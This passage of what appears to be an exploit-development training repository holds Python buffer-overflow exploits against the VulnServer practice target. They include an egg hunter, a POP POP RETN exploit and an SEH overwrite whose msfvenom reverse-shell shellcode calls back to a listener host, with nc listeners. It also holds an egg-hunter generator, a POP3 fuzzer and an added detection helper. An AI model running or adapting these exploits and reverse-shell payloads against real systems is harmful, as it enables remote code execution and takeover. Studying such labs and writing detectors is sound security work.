Eggy += '\x41' * (1000-len(shellcode)-10)
Eggy += '\r\n'
'''
or dx,0x0fff # loop thru memory pages
inc edx by 1 # loop thru addresses for given page
push edx # save EDX in stack before syscall
push byte +0x2 # push the syscall id onto the stack (0x2 here, matching the \x6a\x02 opcode below)
pop eax # store it in EAX
int 0x2e # make syscall
cmp al,0x5 # compare lower portion of EAX with 5 to check for access violations
pop edx # restore EDX after the syscall was made
jz 0x0 # if true go back to first instruction and check the next memory page
mov eax,w00t # else move egg marker value to eax
mov edi,edx # move pointer to EDI
scasd # check for egg value match
jnz 0x5 # if true jump to increment EDX and check the next memory address in page
scasd # else increment EDI and check the value again (to make sure it's not egghunter code)
jnz 0x5 # if true jump to increment EDX and check the next memory address in page
jmp edi # else egg marker found! execute shellcode positioned right after
'''
EggHunter = '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7\x90'
'''
spike file
----------
s_string("GTER");
s_string(" ");
s_string_variable("FUZZ");
s_string("\r\n");
sleep(1);
'''
# second payload
buffer = 'GTER /.:/' # vulnerable command
'''
0: 5a pop edx
1: 4d dec ebp
2: 5f pop edi
'''
buffer += '\x5a\x4d\x5f' # stack alignment to compensate for changes made by GTER command
buffer += EggHunter # hunt baby hunt
buffer += '\x41' * (147-3-len(EggHunter)) # filler to save pointer
buffer += '\xb1\x11\x50\x62' # EIP [call eax] to get back to the start of our buffer
buffer += '\x43' * (5000-9-147-4-2) # filler
buffer += '\r\n'
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.80.133', 9999))
    print '[+] Sending %s bytes of eggy' %len(Eggy)
    s.send(Eggy)
    s.close() # close the first connection before sending the hunter
    time.sleep(1)
except Exception as e:
    print e
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.80.133', 9999))
    print '[+] Sending %s bytes of buffer' %len(buffer)
    time.sleep(1)
    s.send(buffer)
    subprocess.call(['nc -nlvp 1337'], shell=True)
except Exception as e:
    print e
================================================
FILE: Remote Buffer Overflow/VulnServer/Egg Hunter/README.md
================================================
Saved return pointer overwrite found in the `GTER` command; an egg hunter was used to work around the small buffer size.
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/Egg%20Hunter/PoC.gif">
</p>
================================================
FILE: Remote Buffer Overflow/VulnServer/POP POP RETN/Exploit.py
================================================
#!/usr/bin/python
import struct
import time
import socket
from pwn import *
def BufferOverflow():
    # https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
    shellcode = ""
    shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
    shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
    shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
    shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
    shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
    shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
    shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
    shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
    #----------------------------#
    # Payload                    #
    #----------------------------#
    # buffer = CMD + AAA padding # |-------------------------------------------------------------+
    # buffer = EIP overwrite     # |---------| WinXP SP3 Pro [POP POP RETN]|[USER32.dll] |-------|-+
    # buffer = XXXXXXXX          # |------------| Simulate the need for [POP POP RETN] |---------|-|-+
    # buffer = JMP ESP           # |---------| WinXP SP3 Pro : [JMP ESP] | [essfunc.dll] |-------|-|-|-+
    # buffer = NOP sled          # |-------------------------------------------------------------|-|-|-|-+
    # buffer = shellcode         # |-------------------------------------------------------------|-|-|-|-|-+
    # buffer = BBB padding       # |-------------------------------------------------------------|-|-|-|-|-|-+
    #----------------------------#                                                               | | | | | | |
    #                                                                                            | | | | | | |
    buffer = "TRUN ." + "A" * 2006 # <-----------------------------------+                       | | | | | |
    buffer += struct.pack('<L', 0x7E41FE66) # <-------------------------------------+           | | | | |
    buffer += "X" * 8 # <---------------------------------------+                                | | | |
    buffer += struct.pack('<L', 0x625011af) # <-----------------------------------------+       | | |
    buffer += "\x90" * 20 # <-------------------------------------------+                        | |
    buffer += shellcode # <---------------------------------------------+                          |
    buffer += "B" * (3000-6-2006-4-8-4-20-len(shellcode)) # <-----------------------------------------------+
    try:
        r = remote('192.168.80.133', 9999)
        r.recv(2048)
        print "[+] Sending %s bytes evil payload.." %len(buffer)
        r.send(buffer)
    except:
        print "Couldn't connect to target!"
def main():
    print (
    '''
    +-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
    |V|u|l|n|S|e|r|v|e|r| |R|e|m|o|t|e| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
    +-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
    '''
    )
    BufferOverflow()
if __name__ == '__main__':
    main()
================================================
FILE: Remote Buffer Overflow/VulnServer/SEH/Exploit.py
================================================
import socket
import sys
import os
import subprocess
#root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 lport=1337 -b '\x00' EXITFUNC=seh -f python -v shellcode
#No platform was selected, choosing Msf::Module::Platform::Windows from the payload
#No Arch selected, selecting Arch: x86 from the payload
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
#Final size of python file: 1900 bytes
shellcode = ""
shellcode += "\xda\xcc\xbe\xc1\x1a\x26\xcc\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x52\x31\x77\x17\x83\xef\xfc\x03\xb6"
shellcode += "\x09\xc4\x39\xc4\xc6\x8a\xc2\x34\x17\xeb\x4b\xd1"
shellcode += "\x26\x2b\x2f\x92\x19\x9b\x3b\xf6\x95\x50\x69\xe2"
shellcode += "\x2e\x14\xa6\x05\x86\x93\x90\x28\x17\x8f\xe1\x2b"
shellcode += "\x9b\xd2\x35\x8b\xa2\x1c\x48\xca\xe3\x41\xa1\x9e"
shellcode += "\xbc\x0e\x14\x0e\xc8\x5b\xa5\xa5\x82\x4a\xad\x5a"
shellcode += "\x52\x6c\x9c\xcd\xe8\x37\x3e\xec\x3d\x4c\x77\xf6"
shellcode += "\x22\x69\xc1\x8d\x91\x05\xd0\x47\xe8\xe6\x7f\xa6"
shellcode += "\xc4\x14\x81\xef\xe3\xc6\xf4\x19\x10\x7a\x0f\xde"
shellcode += "\x6a\xa0\x9a\xc4\xcd\x23\x3c\x20\xef\xe0\xdb\xa3"
shellcode += "\xe3\x4d\xaf\xeb\xe7\x50\x7c\x80\x1c\xd8\x83\x46"
shellcode += "\x95\x9a\xa7\x42\xfd\x79\xc9\xd3\x5b\x2f\xf6\x03"
shellcode += "\x04\x90\x52\x48\xa9\xc5\xee\x13\xa6\x2a\xc3\xab"
shellcode += "\x36\x25\x54\xd8\x04\xea\xce\x76\x25\x63\xc9\x81"
shellcode += "\x4a\x5e\xad\x1d\xb5\x61\xce\x34\x72\x35\x9e\x2e"
shellcode += "\x53\x36\x75\xae\x5c\xe3\xda\xfe\xf2\x5c\x9b\xae"
shellcode += "\xb2\x0c\x73\xa4\x3c\x72\x63\xc7\x96\x1b\x0e\x32"
shellcode += "\x71\xe4\x67\x6c\x16\x8c\x75\x8c\x1d\x74\xf3\x6a"
shellcode += "\x77\x96\x55\x25\xe0\x0f\xfc\xbd\x91\xd0\x2a\xb8"
shellcode += "\x92\x5b\xd9\x3d\x5c\xac\x94\x2d\x09\x5c\xe3\x0f"
shellcode += "\x9c\x63\xd9\x27\x42\xf1\x86\xb7\x0d\xea\x10\xe0"
shellcode += "\x5a\xdc\x68\x64\x77\x47\xc3\x9a\x8a\x11\x2c\x1e"
shellcode += "\x51\xe2\xb3\x9f\x14\x5e\x90\x8f\xe0\x5f\x9c\xfb"
shellcode += "\xbc\x09\x4a\x55\x7b\xe0\x3c\x0f\xd5\x5f\x97\xc7"
shellcode += "\xa0\x93\x28\x91\xac\xf9\xde\x7d\x1c\x54\xa7\x82"
shellcode += "\x91\x30\x2f\xfb\xcf\xa0\xd0\xd6\x4b\xde\x21\xea"
shellcode += "\x41\x77\x98\x9f\x2b\x15\x1b\x4a\x6f\x20\x98\x7e"
shellcode += "\x10\xd7\x80\x0b\x15\x93\x06\xe0\x67\x8c\xe2\x06"
shellcode += "\xdb\xad\x26"
'''
spike file
----------
s_string("GMON");
s_string(" ");
s_string_variable("FUZZ");
s_string("\r\n");
'''
buffer = 'GMON /.:/ ' # junk
buffer += '\x90' * 2495 # nop sled
buffer += shellcode # reverse shell
buffer += '\x90' * (999-len(shellcode)) # shellcode placeholder
buffer += '\xeb\x0a\x90\x90' # nSEH hop over SEH handler
buffer += '\x2b\x17\x50\x62' # SEH POP, POP, RETN in essfunc.dll
'''
piece of code that allows us to jump forward/backward, taken from Phrack #62 Article 7
fldz
fnstenv [esp-12]
pop ecx
add cl, 10
nop
dec ch ; ecx=-256;
dec ch ; ecx=-256;
dec ch ; ecx=-256;
dec ch ; ecx=-256;
jmp ecx ; lets jmp ecx (current location - 1024)
'''
buffer += '\x90' * 7
buffer += '\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1'
buffer += '\x41' * (5000-10-3494-4-4-2-21-7)
buffer += '\r\n'
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.80.133', 9999))
    print '[+] Sending %s bytes of evil buffer..' %len(buffer)
    s.send(buffer)
    subprocess.call(['nc -nlvp 1337'], shell=True)
except Exception as e:
    print e
================================================
FILE: Remote Buffer Overflow/VulnServer/SEH/README.md
================================================
Vanilla Structured Exception Handler overwrite in the `GMON` command, found using the `Spike` fuzzer.
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/SEH/PoC.gif">
</p>
================================================
FILE: Remote Buffer Overflow/VulnServer/readme.md
================================================
### VulnServer
VulnServer is a purposely vulnerable server made so people like me can learn software exploitation. The subfolders contain all working exploits found in VulnServer.

================================================
FILE: Tools/EggHunter.py
================================================
#!/usr/bin/python
import binascii
import time
import sys
# colors (*NIX systems only)
W = '\033[0m' # white
R = '\033[91m' # Light Red
G = '\033[32m' # green
M = '\033[95m' # Light magenta
# the script takes a user-supplied egg as input and plugs it into Skape's piece of art! the output (opcode) is debugger and binary file friendly.
# Reference: "Safely Searching Process Virtual Address Space" skape 2004 http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
# 0: 66 81 ca ff 0f or dx,0xfff
# 5: 42 inc edx
# 6: 52 push edx
# 7: 6a 02 push 0x2
# 9: 58 pop eax
# a: cd 2e int 0x2e
# c: 3c 05 cmp al,0x5
# e: 5a pop edx
# f: 74 ef je 0x0
# 11: b8 54 30 30 57 mov eax,0x57303054 egg = "T00W"
# 16: 8b fa mov edi,edx
# 18: af scas eax,DWORD PTR es:[edi]
# 19: 75 ea jne 0x5
# 1b: af scas eax,DWORD PTR es:[edi]
# 1c: 75 e7 jne 0x5
# 1e: ff e7 jmp edi
if len(sys.argv) < 2:
    print "Usage: python EggHunter.py <"+G+"egg"+W+">"
    sys.exit(0)
Input = str(sys.argv[1])
if len(Input) != 4:
    # the egg is compared as one dword by SCASD, so it must be exactly 4 characters
    print "["+R+"-"+W+"] Egg must be exactly 4 characters, e.g. T00W"
    sys.exit(1)
# SCASD compares EAX with the dword at [EDI]. The tag in memory is the 4 egg
# characters in string order, so the MOV EAX immediate uses the same byte order:
# "T00W" -> b8 54 30 30 57, exactly as in the listing above (no byte reversal).
Egg = binascii.hexlify(Input)
OpCode = Egg
Shellcode = "".join("\\x"+Egg[i:i+2] for i in range(0, 8, 2))
FinalOpcode = "6681caff0f42526a0258cd2e3c055a74efb8" +M+ OpCode +W+ "8bfaaf75eaaf75e7ffe7"
FinalShellcode = "'\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8" +M+ Shellcode +W+ "\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7'"
print "["+G+"+"+W+"] Egg Hunter shellcode with egg of '"+M+Input+W+"'.."
time.sleep(1)
print R+"Final Opcode "+W+": " + FinalOpcode
print R+"Final Shellcode "+W+": " + FinalShellcode
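The hunter above has a fixed opcode skeleton with only the 4-byte egg varying, and the staged payload is marked by the egg written twice (one SCASD per copy). That structure is also what makes it easy to spot: the following added detection example (not part of the repository; it serves both the VulnServer Egg Hunter exploit's listing and the disassembly above, and the sample buffers are constructed here) scans captured buffers for the skape int 0x2e hunter, recovers the egg it carries, and then locates the doubled egg tag that precedes the staged shellcode:

```python
# Added detection helper, not part of the original repository. It finds skape's
# int 0x2e egg hunter (opcodes from the disassembly above) in a byte buffer,
# recovers the egg, and locates the doubled egg tag that marks a staged payload.
import re

# Opcode bytes before and after the MOV EAX,imm32 that carries the egg; the
# 4-byte immediate following 0xB8 is the egg itself.
HUNTER_PREFIX = (b"\x66\x81\xca\xff\x0f"  # or dx,0xfff
                 b"\x42\x52"              # inc edx / push edx
                 b"\x6a\x02\x58"          # push 0x2 / pop eax
                 b"\xcd\x2e"              # int 0x2e
                 b"\x3c\x05"              # cmp al,0x5
                 b"\x5a"                  # pop edx
                 b"\x74\xef"              # je 0x0
                 b"\xb8")                 # mov eax,<egg>
HUNTER_SUFFIX = (b"\x8b\xfa"              # mov edi,edx
                 b"\xaf\x75\xea"          # scasd / jne 0x5
                 b"\xaf\x75\xe7"          # scasd / jne 0x5
                 b"\xff\xe7")             # jmp edi

HUNTER_RE = re.compile(
    re.escape(HUNTER_PREFIX) + b"(.{4})" + re.escape(HUNTER_SUFFIX), re.DOTALL)


def find_egg_hunters(data):
    """Return (offset, egg) for every egg hunter found in data.

    The egg comes back in memory order, i.e. as the tag string the hunter
    scans for ("T00W" for the VulnServer exploit above).
    """
    return [(m.start(), m.group(1)) for m in HUNTER_RE.finditer(data)]


def find_staged_payloads(data, egg):
    """Return (tag_offset, payload_offset) for each doubled egg tag in data.

    The hunter executes SCASD twice, so the marker is the egg repeated and
    the shellcode begins right after the second copy.
    """
    tag = egg * 2
    return [(m.start(), m.end()) for m in re.finditer(re.escape(tag), data)]


def scan(buffers):
    """Correlate hunters and tags across several captured buffers (e.g. two
    requests to the same service). Returns a list of finding dicts: hunters
    first, then every tag matching an egg seen in any buffer."""
    findings, eggs = [], set()
    for idx, buf in enumerate(buffers):
        for off, egg in find_egg_hunters(buf):
            eggs.add(egg)
            findings.append({"buffer": idx, "type": "hunter",
                             "offset": off, "egg": egg})
    for idx, buf in enumerate(buffers):
        for egg in sorted(eggs):
            for off, start in find_staged_payloads(buf, egg):
                findings.append({"buffer": idx, "type": "tag", "offset": off,
                                 "egg": egg, "payload_at": start})
    return findings


# Constructed sample inputs modelled on the two VulnServer requests above:
# the first stages a tagged payload (filler bytes stand in for shellcode),
# the second carries the hunter after the GTER command and its 3-byte stack
# fix-up, and the third is an ordinary request.
SAMPLE_STAGE1 = b"T00WT00W" + b"\x90" * 16 + b"A" * 32 + b"\r\n"
SAMPLE_STAGE2 = (b"GTER /.:/" + b"\x5a\x4d\x5f"
                 + HUNTER_PREFIX + b"T00W" + HUNTER_SUFFIX + b"\x90"
                 + b"A" * 20 + b"\r\n")
SAMPLE_CLEAN = b"GTER hello\r\n"

if __name__ == "__main__":
    for f in scan([SAMPLE_STAGE1, SAMPLE_STAGE2, SAMPLE_CLEAN]):
        print(f)
```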
================================================
FILE: Tools/FuzzMe.py
================================================
#!/usr/bin/python
import socket
from pwn import *
import time
def Fuzzer():
    buffer = ["A"]
    counter = 500
    while len(buffer) <= 100:
        buffer.append("A" * counter)
        counter = counter + 500
    try:
        # Used SLMail as template here, adjust accordingly!
        r = remote('192.168.199.140', 110)
        r.recv(2048)
        for string in buffer:
            print "Fuzzing with %s bytes of payload" %len(string)
            r.send('USER username\r\n')
            r.recv(2048)
            r.send('PASS ' + string + '\r\n')
            r.recv(2048)
            time.sleep(1)
    except:
        print "Couldn't connect to target, or you hit the jackpot!"
def main():
    print (
    '''
     _______ _______ _______ _______ _______ _______
    |\     /|\     /|\     /|\     /|\     /|\     /|
    | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |
    | |   | | |   | | |   | | |   | | |   | | |   | |
    | |F  | | |u  | | |z  | | |z  | | |M  | | |e  | |
    | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |
    |/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|
                                    by @ihack4falafel
    '''
    )
    Fuzzer()
if __name__ == '__main__':
    main()